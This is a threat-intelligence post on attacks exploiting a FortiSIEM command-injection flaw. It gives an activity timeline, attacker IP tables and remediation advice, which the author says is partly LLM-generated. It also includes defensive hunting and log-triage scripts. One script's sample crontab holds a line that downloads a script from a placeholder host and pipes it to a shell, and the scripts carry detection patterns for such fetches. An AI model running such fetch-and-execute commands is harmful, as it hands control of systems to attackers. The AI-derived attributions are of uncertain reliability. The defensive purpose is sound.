Threat Intel
‘An improper neutralization of special elements used in an OS command (‘OS Command Injection’) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.’
https://www.fortiguard.com/psirt/FG-IR-25-772
This analysis was conducted using data from Defused, enrichment from IPINFO and SHODAN, and then analysis by an LLM (GROK), so take the analysis with a pinch of salt:
Updated FortiSIEM CVE-2025-64155 Exploitation Analysis
Post-Exploitation Activity Observed – January 16, 2026
Report Updated: January 16, 2026 ~19:00 GMT
Key Update – Escalation Observed
On January 16, 2026, the primary attacker IP 154.192.222.43 (Pakistan, Nayatel) shifted from reconnaissance/exfiltration to active post-exploitation scanning shortly after successful CVE-2025-64155 command injection attempts.
Timeline:
- ~16:31–16:37: Three confirmed CVE exploits (hostname read, ICMP/DNS exfiltration).
- ~16:42: Access to /proof.txt (likely verifying web access or leaving a marker).
- ~17:29–17:35: Intensive directory brute-force using gobuster/3.8.2 targeting common webshell, admin panel, and backup paths.
This indicates the attacker has achieved initial code execution and is now hunting for persistence mechanisms, existing backdoors, or sensitive files.
Recent Activity from 154.192.222.43 (Jan 16, 2026)
| Time (GMT) | Alert Type | Severity | Request Summary | Notes |
|---|---|---|---|---|
| 17:31–17:35 | Unknown Traffic | minor | ~70 GET requests via gobuster | Brute-forcing paths like /admin, /shell.php, /.git/config, /te.html, /proof.txt, etc. |
| 17:30 | Unknown Traffic | minor | SIP OPTIONS, RTSP OPTIONS, /nice ports,/Trinity.txt.bak | Protocol probing (SIP/RTSP OPTIONS) + likely Nmap service fingerprinting (classic “/nice ports,/Trinity.txt.bak” probe used by Nmap HTTP scripts) |
| 17:29 | Unknown Traffic | minor | HEAD /, GET /login (curl) | Basic enumeration |
| 16:42 | Unknown Traffic | minor | GET /proof.txt | Potential marker or web access confirmation |
| 16:37 | Vulnerability Exploited | major | CVE-2025-64155 payload | ICMP hostname exfil to self |
| 16:33 | Vulnerability Exploited | major | CVE-2025-64155 payload | DNS hostname exfil (oast.fun) |
| 16:31 | Vulnerability Exploited | major | CVE-2025-64155 payload | cat /etc/hostname |
Gobuster wordlist appears to target common webshells (e.g., sa.php, sf.php), config leaks (.git, .bash_history), and admin interfaces.
Overall Campaign Context
The core infrastructure (11 IPs) remains active. 154.192.222.43 is the most persistent actor, now demonstrating clear post-exploitation intent.
Other recent probes (e.g., 213.209.159.181 attempting .git/config, various scanners hitting common Forti paths) are opportunistic background noise but highlight broad exposure scanning.
Indicators of Compromise (Updated)
Primary Attacker IP (High Confidence)
- 154.192.222.43 – Pakistan, Nayatel AS23674 – Active exploitation + post-exploit scanning
User-Agents & Tools
- gobuster/3.8.2 – Directory brute-forcing
- curl/8.18.0 – Basic checks
- Likely Nmap (via “/nice ports,/Trinity.txt.bak” probe)
Post-Exploitation Paths Targeted (Sample)
/admin, /shell.php, /sa.php, /.git/config, /.bash_history, /te.html, /proof.txt, /cgi-bin/, /remote/logincheck, /geoserver/web/
Recommendations (Urgent)
- Patch CVE-2025-64155 immediately if not already done.
- Block the full infrastructure list (especially 154.192.222.43) at firewall/perimeter.
- Internal hunt: Search for /opt/charting/redishb.sh, unusual cron jobs, outbound ICMP/DNS to suspicious domains, or new files in /tmp.
- Restrict exposure: FortiSIEM management interface should not be internet-facing.
- Monitor closely: Activity from this IP is ongoing and escalating.
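To make the "internal hunt" recommendation concrete, here is an added example (not Fortinet, Defused or the report author's tooling) of a small host-side hunt script. It checks for the dropped script path named above, for recently modified files in /tmp, and for cron entries that fetch remote content or run out of /tmp. The cron heuristics, the `root` parameter (so the checks can run against a test tree instead of "/") and the demo tree built by `build_demo_tree()` are assumptions of this example; the outbound ICMP/DNS check is network-side and not covered here.

```python
"""Host-side hunt for the artifacts this report recommends searching for.

Added example: not Fortinet, Defused or the report author's tooling. The
path /opt/charting/redishb.sh and the /tmp and cron checks come from the
recommendations above; the cron heuristics, the ``root`` parameter (so the
checks can run against a test tree instead of "/") and the demo tree built
by build_demo_tree() are assumptions of this example. Outbound ICMP/DNS
review is a network-side check and is not covered here.
"""
import os
import re
import tempfile
import time

DROPPED_SCRIPT = "opt/charting/redishb.sh"  # relative to root, from the report
TMP_DIR = "tmp"

# Heuristic (assumed) for "unusual" cron jobs: fetching a remote resource,
# running something out of /tmp, or referencing the dropped script name.
CRON_SUSPICIOUS = re.compile(
    r"(curl|wget)\s+[^\n]*https?://|/tmp/|redishb", re.IGNORECASE
)

# Constructed crontab text for the demo; the logrotate line is benign and
# the host name is a placeholder, not an indicator from the report.
DEMO_CRONTAB = """\
# m h dom mon dow command
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://placeholder.invalid/redishb.sh | sh
"""


def check_dropped_script(root):
    """Flag the script path named in the report if it exists under root."""
    path = os.path.join(root, DROPPED_SCRIPT)
    return [("dropped-script", path)] if os.path.isfile(path) else []


def check_recent_tmp(root, since_epoch):
    """Flag files under <root>/tmp modified at or after since_epoch."""
    findings = []
    tmp = os.path.join(root, TMP_DIR)
    if not os.path.isdir(tmp):
        return findings
    for dirpath, _dirs, files in os.walk(tmp):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                if os.stat(full).st_mtime >= since_epoch:
                    findings.append(("recent-tmp-file", full))
            except OSError:
                continue  # file vanished or unreadable; skip it
    return findings


def check_crontab(crontab_text):
    """Flag crontab lines matching CRON_SUSPICIOUS; comments are skipped."""
    findings = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if CRON_SUSPICIOUS.search(stripped):
            findings.append(("suspicious-cron", stripped))
    return findings


def hunt(root="/", crontab_text="", since_epoch=None):
    """Run all checks; returns a list of (finding_type, detail) tuples."""
    if since_epoch is None:
        since_epoch = time.time() - 24 * 3600  # default window: last 24 h
    return (check_dropped_script(root)
            + check_recent_tmp(root, since_epoch)
            + check_crontab(crontab_text))


def build_demo_tree():
    """Create a throwaway directory tree holding the constructed artifacts."""
    root = tempfile.mkdtemp(prefix="hunt-demo-")
    os.makedirs(os.path.join(root, "opt", "charting"))
    os.makedirs(os.path.join(root, "tmp"))
    open(os.path.join(root, "opt", "charting", "redishb.sh"), "w").close()
    open(os.path.join(root, "tmp", "dropped.bin"), "w").close()
    return root


def demo(window_seconds=60):
    """Hunt over the demo tree, looking back window_seconds for /tmp changes."""
    root = build_demo_tree()
    return hunt(root, DEMO_CRONTAB, since_epoch=time.time() - window_seconds)


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind:18} {detail}")
```

On a real appliance you would call `hunt("/", crontab_text=<output of crontab -l plus /etc/cron.d contents>)` and review each finding by hand; the cron heuristic is deliberately broad, so expect benign hits from legitimate update jobs.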
Threat Level: Elevated – Post-exploitation phase in progress.
IOCs
| IP Address | Country | City | ASN / Organization | Key Activity Observed |
|---|---|---|---|---|
| 38.180.81.238 | US | Chicago | AS29802 / 3NT SOLUTIONS LLP | Payload delivery (redishb.sh) |
| 103.224.84.76 | TH | Pak Kret | AS56309 / ReadyIDC Co.,Ltd. | Payload delivery (redishb.sh) |
| 120.231.127.227 | CN | Shanghai | AS9808 / China Mobile | Timing tests (sleep 3) |
| 129.226.190.169 | HK | Hong Kong | AS132203 / Unknown | Payload delivery (redishb.sh) |
| 146.70.201.245 | JP | Togoshi | AS9009 / M247 LTD (VPN) | Advanced RCE + reverse shell attempts |
| 154.192.222.43 | PK | Islamabad | AS23674 / Nayatel Pvt Ltd | Most active: Exfil, exploits, gobuster scanning, Nmap probes |
| 156.146.55.227 | BG | Sofia | AS212238 / Datacamp Ltd (VPN) | HTTP exfil testing (postb.in) |
| 167.17.179.109 | JP | Tokyo | AS26383 / Baxet Group | Payload delivery (redishb.sh) |
| 193.111.208.118 | US | Dallas | AS202015 / HZ Hosting Ltd | Payload delivery (redishb.sh variants) |
| 209.126.11.25 | US | St. Louis | AS40021 / Contabo Inc. | Payload delivery (redishb.sh) |
| 220.181.41.80 | CN | Beijing | AS23724 / CHINANET | Timing tests (sleep 3) |
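As an added example (not Defused's, Fortinet's or the report author's tooling), the following script triages web-server access logs against the indicators in this report: the IOC IPs in the table above, the gobuster/curl User-Agents, the Nmap probe string and the post-exploitation paths from the activity table earlier in the post. The log lines are constructed for illustration in a Combined Log Format layout that the script assumes; `LOG_RE` will need adapting to your own proxy or appliance log format.

```python
"""Triage web access logs against the indicators in this report.

Added example: not Defused's, Fortinet's or the report author's tooling.
The IOC IPs, User-Agents, probe string and targeted paths come from the
report; the log lines below are constructed for illustration, in a Combined
Log Format layout that this script assumes (adapt LOG_RE to your proxy or
appliance log format).
"""
import re
from collections import Counter

# Attacker infrastructure from the report's IOC table.
IOC_IPS = {
    "38.180.81.238", "103.224.84.76", "120.231.127.227", "129.226.190.169",
    "146.70.201.245", "154.192.222.43", "156.146.55.227", "167.17.179.109",
    "193.111.208.118", "209.126.11.25", "220.181.41.80",
}

# Tools named in the report's User-Agents section (prefix match on the UA).
SCANNER_UA_PREFIXES = ("gobuster/", "curl/")

# Post-exploitation paths the report lists as targeted.
TARGETED_PATHS = {
    "/admin", "/shell.php", "/sa.php", "/sf.php", "/.git/config",
    "/.bash_history", "/te.html", "/proof.txt", "/cgi-bin/",
    "/remote/logincheck", "/geoserver/web/",
}

# Nmap's HTTP fingerprinting probe, quoted in the report (note the space).
NMAP_PROBE = "/nice ports,/Trinity.txt.bak"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log (not real traffic). Source IPs, paths and UAs
# mirror the activity table in the report; the last line is benign filler.
SAMPLE_LOG = """\
154.192.222.43 - - [16/Jan/2026:16:42:10 +0000] "GET /proof.txt HTTP/1.1" 404 162 "-" "curl/8.18.0"
154.192.222.43 - - [16/Jan/2026:17:29:03 +0000] "HEAD / HTTP/1.1" 200 0 "-" "curl/8.18.0"
154.192.222.43 - - [16/Jan/2026:17:30:15 +0000] "GET /nice ports,/Trinity.txt.bak HTTP/1.0" 404 162 "-" "Mozilla/5.0"
154.192.222.43 - - [16/Jan/2026:17:31:40 +0000] "GET /shell.php HTTP/1.1" 404 162 "-" "gobuster/3.8.2"
154.192.222.43 - - [16/Jan/2026:17:31:41 +0000] "GET /.git/config HTTP/1.1" 404 162 "-" "gobuster/3.8.2"
213.209.159.181 - - [16/Jan/2026:12:05:00 +0000] "GET /.git/config HTTP/1.1" 404 162 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Jan/2026:12:06:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict of fields for a log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    request = rec.pop("request")
    # Split off the protocol token on the last " HTTP/" rather than on
    # whitespace, because the Nmap probe path itself contains a space.
    rec["path"] = request.rsplit(" HTTP/", 1)[0]
    return rec


def classify(rec):
    """List the indicator tags a parsed record matches (empty if none)."""
    tags = []
    if rec["ip"] in IOC_IPS:
        tags.append("ioc-ip")
    if rec["ua"].startswith(SCANNER_UA_PREFIXES):
        tags.append("scanner-ua")
    if rec["path"] == NMAP_PROBE:
        tags.append("nmap-probe")
    if rec["path"] in TARGETED_PATHS:
        tags.append("targeted-path")
    return tags


def triage(lines):
    """Parse and classify lines.

    Returns (hits, counts): hits is a list of (ip, path, tags) for lines
    with at least one tag; counts is hits per source IP, which makes a
    burst like the ~70 gobuster requests in the report stand out.
    """
    hits = []
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["path"], tags))
            counts[rec["ip"]] += 1
    return hits, counts


if __name__ == "__main__":
    hits, counts = triage(SAMPLE_LOG.splitlines())
    for ip, path, tags in hits:
        print(f"{ip:16} {','.join(tags):35} {path}")
    print("hits per IP:", dict(counts))
```

The `targeted-path` tag deliberately fires on non-IOC sources too (the 213.209.159.181 line in the sample), which matches the report's point that `.git/config` probing from other addresses is background noise: it is worth counting, but only an `ioc-ip` hit or a burst of `scanner-ua` requests from one address should page anyone.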
Summary (AI)
In January 2026, FortiSIEM systems faced widespread exploitation of CVE-2025-64155, a critical unauthenticated command injection vulnerability (CVSS 9.8) in the Elasticsearch storage configuration endpoint. Opportunistic attackers leveraged a distributed network of 11 IPs across countries like Pakistan, Japan, China, and the US to perform reconnaissance, blind data exfiltration via ICMP and DNS, and persistence through malicious script downloads (e.g., redishb.sh). Notably, the primary actor from IP 154.192.222.43 escalated activity on January 16, shifting from successful exploits to aggressive directory brute-forcing with tools like gobuster, signaling active post-compromise hunting for webshells and sensitive files. This ongoing campaign underscores the rapid weaponization of public PoCs—organizations must urgently patch, block the identified infrastructure, and hunt for indicators like unusual cron jobs or outbound connections to mitigate risks.